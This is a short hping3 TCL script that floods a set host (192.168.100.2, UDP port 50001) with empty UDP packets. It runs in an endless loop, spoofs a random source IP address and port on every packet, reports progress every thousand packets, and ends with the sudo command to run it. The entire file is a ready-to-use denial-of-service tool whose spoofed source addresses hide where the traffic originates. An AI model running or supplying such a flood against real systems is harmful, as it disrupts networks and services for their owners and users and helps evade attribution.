# Hping3 UDP Flood with TCL script
# UDP Flood (rand source IP and source port, dest port 50001, ttl=64, payload=0) for hping3 TCL mode

set dst_ip "192.168.100.2"
set dst_port 50001
set count 0

# Function to generate random IP address
proc random_ip {} {
    return "[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}]"
}

# Function to generate random source port (1024–65535)
proc random_port {} {
    return [expr {int(rand()*64512) + 1024}]
}

while {1} {
    set saddr [random_ip]
    set sport [random_port]
    # UDP packet: random source IP, random source port, dest port 50001, TTL=64, empty payload
    set pkt "ip(saddr=$saddr,daddr=$dst_ip,ttl=64)+udp(sport=$sport,dport=$dst_port)"
    hping send $pkt
    incr count
    # Print every 1000 packets sent
    if {[expr {$count % 1000}] == 0} {
        puts "$count UDP packets sent so far..."
    }
}

# To run: sudo hping3 exec udp_flood_0bytes_TCL.htcl